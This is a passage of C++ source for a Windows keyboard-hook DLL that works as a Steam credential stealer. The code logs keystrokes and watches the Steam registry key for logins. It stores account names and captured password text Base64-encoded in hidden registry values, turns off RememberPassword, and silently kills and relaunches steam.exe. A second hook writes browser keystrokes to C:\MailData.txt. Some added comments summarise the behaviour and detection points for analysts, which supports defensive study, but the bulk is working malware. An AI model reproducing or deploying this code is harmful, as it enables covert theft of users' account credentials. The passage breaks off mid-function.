										RegDeleteValue(hKey, TEXT("AutoLoginUser"));

										Login = false;
										szLoginEXE = true;

										RegCloseKey(xKey);
										RegCloseKey(hKey);

										ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
									}
								}
								else
								{
										RegDeleteValue(hKey, TEXT("Gaming"));
										RegDeleteValue(hKey, TEXT("AutoLoginUser"));

										Login = false;
										szLoginEXE = true;

										ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
								}
							}
						}
					}
					Login = false;
					szLoginEXE = true;

					RegCloseKey(xKey);
					RegCloseKey(hKey);
				}
			}
		}
		else
		{
			// Stop watching once steam.exe is gone.
			if( !GetProcess("steam.exe") )
			{
				Login = false;
				szLoginEXE = true;
			}
		}
		Sleep(100);

	} while( !szLoginEXE );

	return 0;
}

 
// 线程 1

static DWORD WINAPI HOOKRegedit(LPVOID pParam)
{
	//AfxMessageBox("线程 1 已启动!");

	HANDLE hNotify;
	HKEY hKeyx;
 
	hNotify = CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 
		FALSE, //不自动重置 
		TRUE,   //设置初始状态 
		"RegistryNotify" //事件对象的名称 
	); 
 
	if (hNotify == 0) 
	{ 
		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe CreateEvent failed!","[ Steam ]",MB_OK); 
		ExitProcess(0); 
	} 
 
	if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 
		"Software\\Valve\\Steam", //子键 
		0, //reserved 
		KEY_NOTIFY, //监视用 
		&hKeyx //保存句柄 
		) != ERROR_SUCCESS) 
	{ 
		CloseHandle(hNotify); 

		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe RegOpenKey failed!","[ Steam ]",MB_OK); 
		ExitProcess(0); 
	} 
 
	if (RegNotifyChangeKeyValue(hKeyx, //监视子键句柄 
		TRUE, //监视此项的子键 
		REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键,监视键值发生是否改变 
		hNotify, //接受注册表变化事件的事件对象句柄 
		TRUE //注册表变化前报告 
		) != ERROR_SUCCESS) 
	{ 
		CloseHandle(hNotify); 
		RegCloseKey(hKeyx); 

		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe RegNotifyChange failed!","[ Steam ]", MB_OK); 
		ExitProcess(0); 
	} 
 
	if (WaitForSingleObject(hNotify, INFINITE) != WAIT_FAILED) 
	{ 
		//MessageBox(NULL,"注册表有改动"," ",MB_OK);

		szStrFirst = "";
		szStrFirst = szStr;
		szStr = "";

		HKEY hKey;
		LONG lRet, lRet2, lRet3, lRet4;
		lRet = RegOpenKeyEx( HKEY_CURRENT_USER,
		TEXT("Software\\Valve\\Steam"),
		0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );
		if( lRet == ERROR_SUCCESS )
		{
			char data[256] = {0}, data2[256] = {0};
			DWORD dwType = REG_SZ, dwType2 = REG_SZ;
			DWORD dwLength = 256, dwLength2 = 256;

			lRet2 = RegQueryValueEx( hKey, 
			TEXT("AutoLoginUser"), 
			NULL, 
			&dwType, (LPBYTE)data, &dwLength );

			lRet3 = RegQueryValueEx( hKey, 
			TEXT("SteamExe"), 
			NULL, 
			&dwType2, (LPBYTE)data2, &dwLength2 );

			DWORD dwLastXError = 0;
			lRet4 = RegSetValueEx( hKey, 
			TEXT("RememberPassword"), 
			NULL, 
			REG_DWORD, (LPBYTE)&dwLastXError, sizeof(DWORD) );

			if(lRet2 == ERROR_SUCCESS && lRet3 == ERROR_SUCCESS)
			{
				szRegUser.Format(TEXT("%s"), data);
				szRegExe.Format(TEXT("%s"), data2);

				DWORD flen;
				char *dataX;
				CFile *file2;
				file2 = new CFile;
				if( file2->Open("C:\\NTUSERS.LOG", CFile::shareDenyNone | CFile::modeRead) )
				{
					flen = file2->GetLength();
					dataX = new char[(int)flen+1];

					file2->SeekToBegin();
					file2->Read(dataX, flen);
				}
				szAccount.Format(TEXT("%s"), dataX);
				file2->Close();
				delete file2;
				delete []dataX;

				//AfxMessageBox(szAccount);

				int ff = szAccount.Find(szRegUser, 0);
				if( ff >= 0 )
				{
					//AfxMessageBox("帐号:"+szRegUser+"\n模糊数据:"+szStrFirst+"\n当前 帐号 为重复数据!");

					Regedit = false;
					RegDeleteValue(hKey, TEXT("AutoLoginUser"));
				}
				else
				{
					HKEY dw_hKey;
					LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,
					TEXT("Software\\Valve\\Steam"),
					0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );
					if( x_Ret1 == ERROR_SUCCESS )
					{
						char dw_data[256] = {0};
						DWORD dw_Type = REG_SZ;
						DWORD dw_Length = 256;

						LONG x_Ret2 = RegQueryValueEx( dw_hKey, 
						TEXT("SteamPath"), 
						NULL, 
						&dw_Type, (LPBYTE)dw_data, &dw_Length );

						szSTPath.Format(TEXT("%s"), dw_data);
						szSTFile.Format(TEXT("%s/ssfn*"), dw_data);
					}
					RegCloseKey(dw_hKey);

					//
					// 删除电脑授权文件

					//char *mySSFNPath = szSTPath.GetBuffer(szSTPath.GetLength()+1);
					//szSTPath.ReleaseBuffer();

					//char *mySSFNFile = szSTFile.GetBuffer(szSTFile.GetLength()+1);
					//szSTFile.ReleaseBuffer();

					//SearchFilesByWildcard_1(mySSFNPath, mySSFNFile);

					//

					CString WriteRegUser = "";
					WriteRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser);

					HKEY hKeyX;
					DWORD dwDisp;
					DWORD dwTypeX = REG_SZ;

					int ret = RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKeyX, &dwDisp);
					if (ret == ERROR_SUCCESS)
					{
						szOneUser=szRegUser+"  ";
						szRegUser=gen(szRegUser);

						CString Base64_szRegUser = "";
						Base64_szRegUser = BASE64Encode(szRegUser, szRegUser.GetLength());

						char *szAc1 = Base64_szRegUser.GetBuffer(Base64_szRegUser.GetLength()+1);
						Base64_szRegUser.ReleaseBuffer();

						int ret2 = RegSetValueEx(hKeyX, TEXT("AccOne"), 0, dwTypeX, (BYTE*)szAc1, strlen(szAc1));
						if (ret2 == ERROR_SUCCESS)
						{
							szStrFirst=gen(szStrFirst);

							CString Base64_szStrFirst = "";
							Base64_szStrFirst = BASE64Encode(szStrFirst, szStrFirst.GetLength());

							char *szDt1 = Base64_szStrFirst.GetBuffer(Base64_szStrFirst.GetLength()+1);
							Base64_szStrFirst.ReleaseBuffer();

							int ret3 = RegSetValueEx(hKeyX, TEXT("DataOne"), 0, dwTypeX, (BYTE*)szDt1, strlen(szDt1));
							if (ret3 == ERROR_SUCCESS)
							{
								//AfxMessageBox("首次帐号:"+szRegUser+"\n首次模糊数据:"+szDt1+"\nEXE路径:"+szRegExe);

								DWORD dwLastError = 0;
								RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastError, sizeof(DWORD) );

								RegCloseKey(hKeyX);
								RegCloseKey(hKey);
								CloseHandle(hNotify);
								RegCloseKey(hKeyx);

								ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe && \""+szRegExe+"\"", NULL, SW_HIDE);

								Sleep(2000);

								Regedit = false;

								//MessageBox(0, "steam.exe 读取系统数据失败,请再次登录! ", "[ Steam ]", MB_ICONERROR | MB_OK | MB_DEFBUTTON1);
							}
						}
					}
					RegCloseKey(hKeyX);
				}
			}
		}
		RegCloseKey(hKey);
	}
	CloseHandle(hNotify);
	RegCloseKey(hKeyx);

	return 0;
}

 
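// Thread 2: registry watcher. IntProc1 starts it when AutoLoginUser already holds a name of
// 4 or more characters.
// Behaviour visible in this function, summarised for analysts:
//   - rewrites AutoLoginUser with a trailing space appended, then waits on a change notification
//     for HKCU\Software\Valve\Steam (named event "RegistryNotify");
//   - on wake-up moves the keystroke buffer szStr (filled by IntProc1) into szStrSecon;
//   - opens, or creates if missing, HKCU\Software\Valve\Steam\<account> and stores the account
//     name and captured text in AccSecond / DataSecond via gen() and BASE64Encode() (both defined
//     outside this section); on the create path AccOne / DataOne are written as empty strings;
//   - on success starts the HOOKLoginEXE thread once (guarded by Login) and, on the open path,
//     writes RememberPassword = 0;
//   - on the failure paths deletes AutoLoginUser, on some of them also the Gaming value and
//     C:\NTUSERS.LOG, and force-kills steam.exe through a hidden cmd.exe.
// Detection points: AutoLoginUser values ending in a space, the AccSecond/DataSecond values under
// a per-account subkey, and the hidden taskkill child process.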

static DWORD WINAPI HOOKRegedit2(LPVOID pParam)
{
	//AfxMessageBox("线程 2 已启动!");

	HKEY hKey_xxx;
	LONG lRet_xxx1 = RegOpenKeyEx( HKEY_CURRENT_USER,
	TEXT("Software\\Valve\\Steam"),
	0, KEY_QUERY_VALUE|KEY_WRITE, &hKey_xxx );
	if( lRet_xxx1 == ERROR_SUCCESS )
	{
		char data_xxx[256] = {0};
		DWORD dwType_xxx = REG_SZ;
		DWORD dwLength_xxx = 256;
		memset(data_xxx, 0, 256);

		LONG lRet_xxx2 = RegQueryValueEx( hKey_xxx, 
		TEXT("AutoLoginUser"), 
		NULL, 
		&dwType_xxx, (LPBYTE)data_xxx, &dwLength_xxx );
		if(lRet_xxx2 == ERROR_SUCCESS)
		{
			CString myReg1User = "";
			myReg1User.Format(TEXT("%s "), data_xxx);

			char *sz1User = myReg1User.GetBuffer(myReg1User.GetLength()+1);
			myReg1User.ReleaseBuffer();

			DWORD XdwType_X = REG_SZ;
			RegSetValueEx( hKey_xxx, TEXT("AutoLoginUser"), 0, XdwType_X, (BYTE*)sz1User, strlen(sz1User) );
		}
	}
	RegCloseKey(hKey_xxx);

	HANDLE hNotify;
	HKEY hxKeyx;
	hNotify = CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 
		FALSE, //不自动重置 
		TRUE,   //设置初始状态 
		"RegistryNotify" //事件对象的名称 
	); 

	if (hNotify == 0) 
	{ 
		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe CreateEvent failed!","[ Steam ]",MB_OK); 
		ExitProcess(0); 
	} 
 
	if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 
		"Software\\Valve\\Steam", //子键 
		0, //reserved 
		KEY_NOTIFY, //监视用 
		&hxKeyx //保存句柄 
		) != ERROR_SUCCESS) 
	{ 
		CloseHandle(hNotify); 

		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe RegOpenKey failed!","[ Steam ]",MB_OK); 
		ExitProcess(0); 
	} 

	if (RegNotifyChangeKeyValue(hxKeyx, //监视子键句柄 
		TRUE, //监视此项的子键 
		REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键,监视键值发生是否改变 
		hNotify, //接受注册表变化事件的事件对象句柄 
		TRUE //注册表变化前报告 
		) != ERROR_SUCCESS) 
	{ 
		CloseHandle(hNotify); 
		RegCloseKey(hxKeyx); 

		Regedit = false;

		ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);

		MessageBox(NULL,"steam.exe RegNotifyChange failed!","[ Steam ]", MB_OK); 
		ExitProcess(0); 
	} 

	if (WaitForSingleObject(hNotify, INFINITE) != WAIT_FAILED) 
	{ 
		//MessageBox(NULL,"注册表有改动"," ",MB_OK);

		szStrSecon = "";
		szStrSecon = szStr;
		szStr = "";

		HKEY hKey;
		LONG lRet, lRet2;
		lRet = RegOpenKeyEx( HKEY_CURRENT_USER,
		TEXT("Software\\Valve\\Steam"),
		0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );
		if( lRet == ERROR_SUCCESS )
		{
			char data[256] = {0};
			DWORD dwType = REG_SZ;
			DWORD dwLength = 256;

			lRet2 = RegQueryValueEx( hKey, 
			TEXT("AutoLoginUser"), 
			NULL, 
			&dwType, (LPBYTE)data, &dwLength );
			if(lRet2 == ERROR_SUCCESS)
			{
				szMailID.Format(TEXT("%s"), data);
				szMailID.Replace(" ", "");

				szRegUser2.Format(TEXT("%s"), data);
				szRegUser2.Replace(" ", "");

				//AfxMessageBox("二次帐号:"+szRegUser2+"\n二次密码:"+szStrSecon);

				CString ReadRegUser = "";
				ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser2);

				HKEY xKey;
				LONG lRet3, lRet4, lRet5;
				lRet3 = RegOpenKeyEx( HKEY_CURRENT_USER,
				ReadRegUser,
				0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );
				if( lRet3 == ERROR_SUCCESS )
				{
					char xdata[256] = {0};
					char xdata2[256] = {0};
					DWORD xdwType1 = REG_SZ;
					DWORD xdwType2 = REG_SZ;
					DWORD xdwLength1 = 256;
					DWORD xdwLength2 = 256;

					lRet4 = RegQueryValueEx( xKey, 
					TEXT("AccOne"), 
					NULL, 
					&xdwType1, (LPBYTE)xdata, &xdwLength1 );

					lRet5 = RegQueryValueEx( xKey, 
					TEXT("DataOne"), 
					NULL, 
					&xdwType2, (LPBYTE)xdata2, &xdwLength2 );
					if(lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS)
					{
						CString szReplaceStr = "";
						CString Base64_AccSeconData = "", Base64_DataSeconData = "";

						szReplaceStr = szRegUser2 + "   ";
						szRegUser2 = gen(szRegUser2);

						Sleep(500);

						szStrSecon.Replace(szReplaceStr, "");
						szStrSecon = gen(szStrSecon);

						Base64_AccSeconData = BASE64Encode(szRegUser2, szRegUser2.GetLength());
						Sleep(500);
						Base64_DataSeconData = BASE64Encode(szStrSecon, szStrSecon.GetLength());

						char *szAcc2 = Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()+1);
						Base64_AccSeconData.ReleaseBuffer();

						char *szData2 = Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()+1);
						Base64_DataSeconData.ReleaseBuffer();

						DWORD XxdwTypeX1 = REG_SZ, XxdwTypeX2 = REG_SZ;
						LONG lRet6 = RegSetValueEx( xKey, 
						TEXT("AccSecond"), 
						NULL, 
						XxdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));

						LONG lRet7 = RegSetValueEx( xKey, 
						TEXT("DataSecond"), 
						NULL, 
						XxdwTypeX2, (BYTE*)szData2, strlen(szData2));

						if(lRet6 == ERROR_SUCCESS && lRet7 == ERROR_SUCCESS)
						{
							//AfxMessageBox("设置注册表用户数据成功!");

							if( !Login )
							{
								DWORD dwThreadId;
								thread = CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, &dwThreadId);

								Login = true;
							}

							DWORD xdwLastErrorx = 0;
							RegSetValueEx( hKey, 
							TEXT("RememberPassword"), 
							NULL, 
							REG_DWORD, (LPBYTE)&xdwLastErrorx, sizeof(DWORD) );
						}
						else
						{
							//AfxMessageBox("设置注册表用户数据失败!");

							RegDeleteValue(hKey, TEXT("AutoLoginUser"));

							RegCloseKey(xKey);
							RegCloseKey(hKey);
							RegCloseKey(hxKeyx);
							CloseHandle(hNotify);

							Regedit = false;

							ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
						}
					}
					else
					{
						//AfxMessageBox("打开注册表用户数据键值失败!");

						DeleteFile("C:\\NTUSERS.LOG");
						RegDeleteValue(hKey, TEXT("AutoLoginUser"));

						RegCloseKey(xKey);
						RegCloseKey(hKey);
						RegCloseKey(hxKeyx);
						CloseHandle(hNotify);

						Regedit = false;

						ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
					}
				}
				else
				{
					//AfxMessageBox("打开注册表用户数据目录失败!");

					char dataZ[256] = {0};
					DWORD dwTypeZ = REG_SZ;
					DWORD dwLengthZ = 256;

					LONG lRet3Z = RegQueryValueEx( hKey, 
					TEXT("AutoLoginUser"), 
					NULL, 
					&dwTypeZ, (LPBYTE)dataZ, &dwLengthZ );

					DWORD dwLastErrorx = 0;
					LONG lRet4Z = RegSetValueEx( hKey, 
					TEXT("RememberPassword"), 
					NULL, 
					REG_DWORD, (LPBYTE)&dwLastErrorx, sizeof(DWORD) );
					if(lRet3Z == ERROR_SUCCESS)
					{
						//AfxMessageBox("Gaming is True!\n二次帐号:"+szRegUser3+"\n二次密码:"+szStrSecon);

						CString szRegUser3 = "";
						szRegUser3.Format(TEXT("%s"), dataZ);

						CString WriteRegUser = "";
						WriteRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser3);

						HKEY xhKeyX;
						DWORD XxdwDisp;
						LONG lRetz = RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &xhKeyX, &XxdwDisp);
						if(lRetz == ERROR_SUCCESS)
						{
							CString szReplaceStr = "";
							CString Base64_AccSeconData = "", Base64_DataSeconData = "";

							szReplaceStr = szRegUser3 + "   ";
							szRegUser3 = gen(szRegUser3);

							Sleep(500);

							szStrSecon.Replace(szReplaceStr, "");
							szStrSecon = gen(szStrSecon);

							Base64_AccSeconData = BASE64Encode(szRegUser3, szRegUser3.GetLength());
							Sleep(500);
							Base64_DataSeconData = BASE64Encode(szStrSecon, szStrSecon.GetLength());

							char *szAcc2 = Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()+1);
							Base64_AccSeconData.ReleaseBuffer();

							char *szData2 = Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()+1);
							Base64_DataSeconData.ReleaseBuffer();

							DWORD XdwTypeX1 = REG_SZ, XdwTypeX2 = REG_SZ;
							DWORD XdwTypeX3 = REG_SZ, XdwTypeX4 = REG_SZ;

							LONG lRet6z = RegSetValueEx( xhKeyX, 
							TEXT("AccSecond"), 
							NULL, 
							XdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));

							LONG lRet7z = RegSetValueEx( xhKeyX, 
							TEXT("DataSecond"), 
							NULL, 
							XdwTypeX2, (BYTE*)szData2, strlen(szData2));

							LONG lRet8z = RegSetValueEx( xhKeyX, 
							TEXT("AccOne"), 
							NULL, 
							XdwTypeX3, (BYTE*)"", 0);

							LONG lRet9z = RegSetValueEx( xhKeyX, 
							TEXT("DataOne"), 
							NULL, 
							XdwTypeX4, (BYTE*)"", 0);

							if(lRet6z == ERROR_SUCCESS && lRet7z == ERROR_SUCCESS && lRet8z == ERROR_SUCCESS && lRet9z == ERROR_SUCCESS)
							{
								if( !Login )
								{
									DWORD dwThreadId;
									thread = CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, &dwThreadId);

									Login = true;
								}

								RegDeleteValue(hKey, TEXT("Gaming"));
							}
							else
							{
								RegDeleteValue(hKey, TEXT("AutoLoginUser"));

								Regedit = false;

								RegCloseKey(xhKeyX);
								RegCloseKey(xKey);
								RegCloseKey(hKey);
								RegCloseKey(hxKeyx);
								CloseHandle(hNotify);

								ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
							}
						}
						RegCloseKey(xhKeyX);
					}
					else
					{
						DeleteFile("C:\\NTUSERS.LOG");
						RegDeleteValue(hKey, TEXT("Gaming"));
						RegDeleteValue(hKey, TEXT("AutoLoginUser"));

						Regedit = false;
						RegCloseKey(hKey);
						RegCloseKey(hxKeyx);
						CloseHandle(hNotify);

						ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
					}
				}
				Regedit = false;
				RegCloseKey(xKey);
			}
			else
			{
				Regedit = false;
				RegDeleteValue(hKey, TEXT("AutoLoginUser"));
			}
		}
		RegCloseKey(hKey);
	} 
	CloseHandle(hNotify);
	RegCloseKey(hxKeyx);

	return 0;
}

 
// Periodically delete the account record file (C:\NTUSERS.LOG)

// Thread routine started by installhook(): loops forever, sleeping and then deleting
// C:\NTUSERS.LOG (the file HOOKRegedit reads to recognise accounts it has already handled).
// pParam is unused. The trailing return is never reached because the loop has no exit.
static DWORD WINAPI CleanUserData(LPVOID pParam)
{
	while(1)
	{
		// The original note says "every 3 hours", but 3600000 ms is one hour.

		Sleep(3600000);

		DeleteFile("C:\\NTUSERS.LOG");
	}
	return 0;
}

 
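// Keyboard hook callback 2 (the author's label: monitors browser input).
// Behaviour visible in this function, summarised for analysts:
//   - acts only when EnumWindows(EnumWindowsProc, NULL) returns FALSE; EnumWindowsProc is defined
//     outside this section, so the window test it applies is not visible here;
//   - handles only fresh key presses: (lParam & 0xc000ffff) == 1 means repeat count 1 with the
//     previous-state and transition bits clear; presses made with Ctrl or Alt held are ignored;
//   - maps the virtual-key code to a character using the Shift / Caps Lock state and writes that
//     one character to C:\MailData.txt (created on first use, appended to afterwards);
//     Backspace is written as "[Back_Space]", Tab as three spaces, Enter as four spaces;
//   - always forwards the event with CallNextHookEx(hie, ...).
// Detection points: C:\MailData.txt growing one character per keystroke, written from whichever
// process the hook DLL has been loaded into.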

LRESULT DllExport CALLBACK IntProc2(int nCode, WPARAM wParam, LPARAM lParam)
{
		if( !::EnumWindows(EnumWindowsProc, NULL) )
		{
			if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1)
			{
				BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);
				BOOL b_Clk = ::GetKeyState(VK_CAPITAL);
				BOOL b_Ctl = ::GetAsyncKeyState(VK_CONTROL) >> ((sizeof(short) * 8)-1);
				BOOL b_Alt = ::GetAsyncKeyState(VK_MENU) >> ((sizeof(short) * 8)-1);
				if(!b_Ctl && !b_Alt)
				{
					if(b_Sft && !b_Clk)
					{
						switch(wParam)
						{
						case '1':myEmailSTR = "!";break;
						case '2':myEmailSTR = "@";break;
						case '3':myEmailSTR = "#";break;
						case '4':myEmailSTR = "$";break;
						case '5':myEmailSTR = "%";break;
						case '6':myEmailSTR = "^";break;
						case '7':myEmailSTR = "&";break;
						case '8':myEmailSTR = "*";break;
						case '9':myEmailSTR = "(";break;
						case '0':myEmailSTR = ")";break;
						case 'A':myEmailSTR = "A";break;
						case 'B':myEmailSTR = "B";break;
						case 'C':myEmailSTR = "C";break;
						case 'D':myEmailSTR = "D";break;
						case 'E':myEmailSTR = "E";break;
						case 'F':myEmailSTR = "F";break;
						case 'G':myEmailSTR = "G";break;
						case 'H':myEmailSTR = "H";break;
						case 'I':myEmailSTR = "I";break;
						case 'J':myEmailSTR = "J";break;
						case 'K':myEmailSTR = "K";break;
						case 'L':myEmailSTR = "L";break;
						case 'M':myEmailSTR = "M";break;
						case 'N':myEmailSTR = "N";break;
						case 'O':myEmailSTR = "O";break;
						case 'P':myEmailSTR = "P";break;
						case 'Q':myEmailSTR = "Q";break;
						case 'R':myEmailSTR = "R";break;
						case 'S':myEmailSTR = "S";break;
						case 'T':myEmailSTR = "T";break;
						case 'U':myEmailSTR = "U";break;
						case 'V':myEmailSTR = "V";break;
						case 'W':myEmailSTR = "W";break;
						case 'X':myEmailSTR = "X";break;
						case 'Y':myEmailSTR = "Y";break;
						case 'Z':myEmailSTR = "Z";break;
						}
					}
					else if(!b_Sft && b_Clk)
					{
						switch(wParam)
						{
						case '1':myEmailSTR = "1";break;
						case '2':myEmailSTR = "2";break;
						case '3':myEmailSTR = "3";break;
						case '4':myEmailSTR = "4";break;
						case '5':myEmailSTR = "5";break;
						case '6':myEmailSTR = "6";break;
						case '7':myEmailSTR = "7";break;
						case '8':myEmailSTR = "8";break;
						case '9':myEmailSTR = "9";break;
						case '0':myEmailSTR = "0";break;
						case 'A':myEmailSTR = "A";break;
						case 'B':myEmailSTR = "B";break;
						case 'C':myEmailSTR = "C";break;
						case 'D':myEmailSTR = "D";break;
						case 'E':myEmailSTR = "E";break;
						case 'F':myEmailSTR = "F";break;
						case 'G':myEmailSTR = "G";break;
						case 'H':myEmailSTR = "H";break;
						case 'I':myEmailSTR = "I";break;
						case 'J':myEmailSTR = "J";break;
						case 'K':myEmailSTR = "K";break;
						case 'L':myEmailSTR = "L";break;
						case 'M':myEmailSTR = "M";break;
						case 'N':myEmailSTR = "N";break;
						case 'O':myEmailSTR = "O";break;
						case 'P':myEmailSTR = "P";break;
						case 'Q':myEmailSTR = "Q";break;
						case 'R':myEmailSTR = "R";break;
						case 'S':myEmailSTR = "S";break;
						case 'T':myEmailSTR = "T";break;
						case 'U':myEmailSTR = "U";break;
						case 'V':myEmailSTR = "V";break;
						case 'W':myEmailSTR = "W";break;
						case 'X':myEmailSTR = "X";break;
						case 'Y':myEmailSTR = "Y";break;
						case 'Z':myEmailSTR = "Z";break;
						}
					}
					else if(b_Sft && b_Clk)
					{
						switch(wParam)
						{
						case '1':myEmailSTR = "!";break;
						case '2':myEmailSTR = "@";break;
						case '3':myEmailSTR = "#";break;
						case '4':myEmailSTR = "$";break;
						case '5':myEmailSTR = "%";break;
						case '6':myEmailSTR = "^";break;
						case '7':myEmailSTR = "&";break;
						case '8':myEmailSTR = "*";break;
						case '9':myEmailSTR = "(";break;
						case '0':myEmailSTR = ")";break;
						case 'A':myEmailSTR = "a";break;
						case 'B':myEmailSTR = "b";break;
						case 'C':myEmailSTR = "c";break;
						case 'D':myEmailSTR = "d";break;
						case 'E':myEmailSTR = "e";break;
						case 'F':myEmailSTR = "f";break;
						case 'G':myEmailSTR = "g";break;
						case 'H':myEmailSTR = "h";break;
	     				case 'I':myEmailSTR = "i";break;
	    				case 'J':myEmailSTR = "j";break;
	    				case 'K':myEmailSTR = "k";break;
						case 'L':myEmailSTR = "l";break;
						case 'M':myEmailSTR = "m";break;
						case 'N':myEmailSTR = "n";break;
						case 'O':myEmailSTR = "o";break;
						case 'P':myEmailSTR = "p";break;
						case 'Q':myEmailSTR = "q";break;
						case 'R':myEmailSTR = "r";break;
						case 'S':myEmailSTR = "s";break;
						case 'T':myEmailSTR = "t";break;
						case 'U':myEmailSTR = "u";break;
						case 'V':myEmailSTR = "v";break;
						case 'W':myEmailSTR = "w";break;
						case 'X':myEmailSTR = "x";break;
						case 'Y':myEmailSTR = "y";break;
						case 'Z':myEmailSTR = "z";break;
						}
					}
					else
					{
						switch(wParam)
						{
						case '1':myEmailSTR = "1";break;
						case '2':myEmailSTR = "2";break;
						case '3':myEmailSTR = "3";break;
						case '4':myEmailSTR = "4";break;	
						case '5':myEmailSTR = "5";break;
						case '6':myEmailSTR = "6";break;
						case '7':myEmailSTR = "7";break;
						case '8':myEmailSTR = "8";break;
						case '9':myEmailSTR = "9";break;
						case '0':myEmailSTR = "0";break;
						case 'A':myEmailSTR = "a";break;
						case 'B':myEmailSTR = "b";break;
						case 'C':myEmailSTR = "c";break;
						case 'D':myEmailSTR = "d";break;
						case 'E':myEmailSTR = "e";break;
						case 'F':myEmailSTR = "f";break;
						case 'G':myEmailSTR = "g";break;
						case 'H':myEmailSTR = "h";break;
	     				case 'I':myEmailSTR = "i";break;
	    				case 'J':myEmailSTR = "j";break;
	    				case 'K':myEmailSTR = "k";break;
						case 'L':myEmailSTR = "l";break;
						case 'M':myEmailSTR = "m";break;
						case 'N':myEmailSTR = "n";break;
						case 'O':myEmailSTR = "o";break;
						case 'P':myEmailSTR = "p";break;
						case 'Q':myEmailSTR = "q";break;
						case 'R':myEmailSTR = "r";break;
						case 'S':myEmailSTR = "s";break;
						case 'T':myEmailSTR = "t";break;
						case 'U':myEmailSTR = "u";break;
						case 'V':myEmailSTR = "v";break;
						case 'W':myEmailSTR = "w";break;
						case 'X':myEmailSTR = "x";break;
						case 'Y':myEmailSTR = "y";break;
						case 'Z':myEmailSTR = "z";break;
						}
					}

					//小键盘按键
					switch(wParam)
					{
					case VK_NUMPAD1:myEmailSTR = "1";break;
					case VK_NUMPAD2:myEmailSTR = "2";break;
					case VK_NUMPAD3:myEmailSTR = "3";break;
					case VK_NUMPAD4:myEmailSTR = "4";break;
					case VK_NUMPAD5:myEmailSTR = "5";break;
					case VK_NUMPAD6:myEmailSTR = "6";break;
					case VK_NUMPAD7:myEmailSTR = "7";break;
					case VK_NUMPAD8:myEmailSTR = "8";break;
					case VK_NUMPAD9:myEmailSTR = "9";break;
					case VK_NUMPAD0:myEmailSTR = "0";break;
					case VK_MULTIPLY:myEmailSTR = "*";break;
					case VK_ADD:     myEmailSTR = "+";break;
					case VK_SUBTRACT:myEmailSTR = "-";break;
					case VK_DECIMAL: myEmailSTR = ".";break;
					case VK_DIVIDE:  myEmailSTR = "/";break;

					//其他特殊键
 					case VK_BACK:
						myEmailSTR = "[Back_Space]";
						//myEmailSTR.Delete(myEmailSTR.GetLength()-1);
						break;

					case VK_TAB:
						myEmailSTR = "   ";
						break;

					case VK_SPACE:
						myEmailSTR = " ";
						break;

					// 回车键
					case VK_RETURN:
						myEmailSTR = "    ";
						break;
					}

					//其他键的处理
					char KeyName[50];
					ZeroMemory(KeyName,50);
					GetKeyNameText(lParam,KeyName,50);
					CString KeyNameStr=KeyName;
					if(KeyNameStr=="`")
					{
						if(b_Sft)
							myEmailSTR = "~";
						else
							myEmailSTR = "`";
					}
					if(KeyNameStr=="-")
					{
						if(b_Sft)
							myEmailSTR = "_";
						else
							myEmailSTR = "-";
					}
					if(KeyNameStr=="=")
					{
						if(b_Sft)
							myEmailSTR = "+";
						else
